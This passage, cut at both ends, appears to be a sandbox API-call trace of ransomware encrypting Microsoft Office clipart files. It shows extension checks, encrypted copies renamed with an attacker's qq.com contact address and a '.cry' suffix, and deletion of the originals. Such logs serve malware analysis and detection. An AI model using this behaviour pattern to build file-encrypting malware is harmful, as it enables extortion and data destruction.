Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63 [0053.411] lstrlenW (lpString=".doc") returned 4 [0053.411] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.411] lstrlenW (lpString=".docx") returned 5 [0053.411] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.411] lstrlenW (lpString=".pdf") returned 4 [0053.411] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.411] lstrlenW (lpString=".xls") returned 4 [0053.411] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.411] lstrlenW (lpString=".xlsx") returned 5 [0053.411] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.411] lstrlenW (lpString=".ppt") returned 4 [0053.411] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63 [0053.411] lstrlenW (lpString=".zip") returned 4 [0053.411] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.411] lstrlenW (lpString=".rar") returned 4 [0053.411] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.411] lstrlenW (lpString=".bz2") returned 4 [0053.411] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.411] lstrlenW (lpString=".7z") returned 3 [0053.411] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63 [0053.411] lstrlenW (lpString=".dbf") returned 4 [0053.411] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63 [0053.411] lstrlenW (lpString=".1cd") returned 4 [0053.411] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63 [0053.411] lstrlenW (lpString=".jpg") returned 4 [0053.411] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.412] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=16180) returned 1 [0053.412] CloseHandle (hObject=0x204) returned 1 [0053.412] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf")) returned 0x20 [0053.412] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.412] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0053.412] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.412] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.412] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0053.412] GetLastError () returned 0x0 [0053.412] ReadFile (in: hFile=0x204, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x3f34, lpOverlapped=0x0) returned 1 [0053.452] WriteFile (in: hFile=0x194, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x3f40, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x3f40, lpOverlapped=0x0) returned 1 [0053.453] ReadFile (in: hFile=0x204, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.453] WriteFile (in: hFile=0x194, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.453] SetEndOfFile (hFile=0x194) returned 1 [0053.453] CloseHandle (hObject=0x194) returned 1 [0053.453] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.453] SetEndOfFile (hFile=0x204) returned 1 [0053.454] CloseHandle (hObject=0x204) returned 1 [0053.454] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.455] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf")) returned 1 [0053.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63 [0053.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63 [0053.455] lstrlenW (lpString=".doc") returned 4 [0053.455] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.455] lstrlenW (lpString=".docx") returned 5 [0053.455] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.455] lstrlenW (lpString=".pdf") returned 4 [0053.455] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.455] lstrlenW (lpString=".xls") returned 4 [0053.455] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.455] lstrlenW (lpString=".xlsx") returned 5 [0053.455] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.455] lstrlenW (lpString=".ppt") returned 4 [0053.455] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63 [0053.455] lstrlenW (lpString=".zip") returned 4 [0053.455] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.456] lstrlenW (lpString=".rar") returned 4 [0053.456] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.456] lstrlenW (lpString=".bz2") returned 4 [0053.456] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.456] lstrlenW (lpString=".7z") returned 3 [0053.456] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63 [0053.456] lstrlenW (lpString=".dbf") returned 4 [0053.456] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63 [0053.456] lstrlenW (lpString=".1cd") returned 4 [0053.456] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63 [0053.456] lstrlenW (lpString=".jpg") returned 4 [0053.456] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.456] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=4924) returned 1 [0053.456] CloseHandle (hObject=0x204) returned 1 [0053.456] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07804_.wmf")) returned 0x20 [0053.456] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07804_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.456] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07804_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0053.457] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.457] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.457] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07804_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0053.457] GetLastError () returned 0x0 [0053.457] ReadFile (in: hFile=0x204, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x133c, lpOverlapped=0x0) returned 1 [0053.635] WriteFile (in: hFile=0x194, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x1340, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x1340, lpOverlapped=0x0) returned 1 [0053.635] ReadFile (in: hFile=0x204, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.636] WriteFile (in: hFile=0x194, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.636] SetEndOfFile (hFile=0x194) returned 1 [0054.168] CloseHandle (hObject=0x194) returned 1 [0054.169] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.169] SetEndOfFile (hFile=0x204) returned 1 [0054.169] CloseHandle (hObject=0x204) returned 1 [0054.170] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0054.170] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07804_.wmf")) returned 1 [0054.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63 [0054.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63 [0054.245] lstrlenW (lpString=".doc") returned 4 [0054.245] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.245] lstrlenW (lpString=".docx") returned 5 [0054.245] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.245] lstrlenW (lpString=".pdf") returned 4 [0054.245] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.245] lstrlenW (lpString=".xls") returned 4 [0054.245] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.245] lstrlenW (lpString=".xlsx") returned 5 [0054.245] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.245] lstrlenW (lpString=".ppt") returned 4 [0054.246] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63 [0054.246] lstrlenW (lpString=".zip") returned 4 [0054.246] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.246] lstrlenW (lpString=".rar") returned 4 [0054.246] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.246] lstrlenW (lpString=".bz2") returned 4 [0054.246] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.246] lstrlenW (lpString=".7z") returned 3 [0054.246] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63 [0054.246] lstrlenW (lpString=".dbf") returned 4 [0054.246] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63 [0054.246] lstrlenW (lpString=".1cd") returned 4 [0054.246] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63 [0054.246] lstrlenW (lpString=".jpg") returned 4 [0054.246] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.785] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.785] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.785] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0054.785] GetLastError () returned 0x0 [0054.785] ReadFile (in: hFile=0x220, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0xbb7c, lpOverlapped=0x0) returned 1 [0054.953] WriteFile (in: hFile=0x1f4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xbb80, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xbb80, lpOverlapped=0x0) returned 1 [0055.127] ReadFile (in: hFile=0x220, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.127] WriteFile (in: hFile=0x1f4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.127] SetEndOfFile (hFile=0x1f4) returned 1 [0055.250] CloseHandle (hObject=0x1f4) returned 1 [0055.250] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.250] SetEndOfFile (hFile=0x220) returned 1 [0055.251] CloseHandle (hObject=0x220) returned 1 [0055.251] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0055.252] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf")) returned 1 [0055.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63 [0055.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63 [0055.262] lstrlenW (lpString=".doc") returned 4 [0055.262] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.262] lstrlenW (lpString=".docx") returned 5 [0055.262] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.262] lstrlenW (lpString=".pdf") returned 4 [0055.262] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.262] lstrlenW (lpString=".xls") returned 4 [0055.262] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.262] lstrlenW (lpString=".xlsx") returned 5 [0055.262] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.262] lstrlenW (lpString=".ppt") returned 4 [0055.262] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63 [0055.262] lstrlenW (lpString=".zip") returned 4 [0055.262] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.262] lstrlenW (lpString=".rar") returned 4 [0055.262] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.262] lstrlenW (lpString=".bz2") returned 4 [0055.262] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.262] lstrlenW (lpString=".7z") returned 3 [0055.262] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63 [0055.262] lstrlenW (lpString=".dbf") returned 4 [0055.262] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63 [0055.262] lstrlenW (lpString=".1cd") returned 4 [0055.262] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63 [0055.263] lstrlenW (lpString=".jpg") returned 4 [0055.263] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.263] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.263] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.263] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09194_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0055.264] GetLastError () returned 0x0 [0055.264] ReadFile (in: hFile=0x21c, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x38cc, lpOverlapped=0x0) returned 1 [0055.488] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x38d0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x38d0, lpOverlapped=0x0) returned 1 [0055.489] ReadFile (in: hFile=0x21c, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.489] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.489] SetEndOfFile (hFile=0x184) returned 1 [0055.490] CloseHandle (hObject=0x184) returned 1 [0055.490] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.490] SetEndOfFile (hFile=0x21c) returned 1 [0055.492] CloseHandle (hObject=0x21c) returned 1 [0055.492] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0055.493] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09194_.wmf")) returned 1 [0055.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63 [0055.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63 [0055.509] lstrlenW (lpString=".doc") returned 4 [0055.509] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.509] lstrlenW (lpString=".docx") returned 5 [0055.509] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.509] lstrlenW (lpString=".pdf") returned 4 [0055.509] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.509] lstrlenW (lpString=".xls") returned 4 [0055.509] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.509] lstrlenW (lpString=".xlsx") returned 5 [0055.509] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.509] lstrlenW (lpString=".ppt") returned 4 [0055.509] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63 [0055.509] lstrlenW (lpString=".zip") returned 4 [0055.509] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.509] lstrlenW (lpString=".rar") returned 4 [0055.509] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.509] lstrlenW (lpString=".bz2") returned 4 [0055.509] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.509] lstrlenW (lpString=".7z") returned 3 [0055.509] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63 [0055.509] lstrlenW (lpString=".dbf") returned 4 [0055.509] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63 [0055.509] lstrlenW (lpString=".1cd") returned 4 [0055.509] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63 [0055.509] lstrlenW (lpString=".jpg") returned 4 [0055.509] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.515] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.515] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19563_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0055.516] GetLastError () returned 0x0 [0055.516] ReadFile (in: hFile=0x21c, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x4fe6, lpOverlapped=0x0) returned 1 [0055.619] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x4ff0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x4ff0, lpOverlapped=0x0) returned 1 [0055.621] ReadFile (in: hFile=0x21c, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.621] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.621] SetEndOfFile (hFile=0x184) returned 1 [0055.621] CloseHandle (hObject=0x184) returned 1 [0055.621] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.621] SetEndOfFile (hFile=0x21c) returned 1 [0055.622] CloseHandle (hObject=0x21c) returned 1 [0055.622] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0055.623] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19563_.gif")) returned 1 [0055.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63 [0055.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63 [0055.623] lstrlenW (lpString=".doc") returned 4 [0055.623] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0055.623] lstrlenW (lpString=".docx") returned 5 [0055.623] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0055.623] lstrlenW (lpString=".pdf") returned 4 [0055.623] lstrcmpiW (lpString1=".pdf", 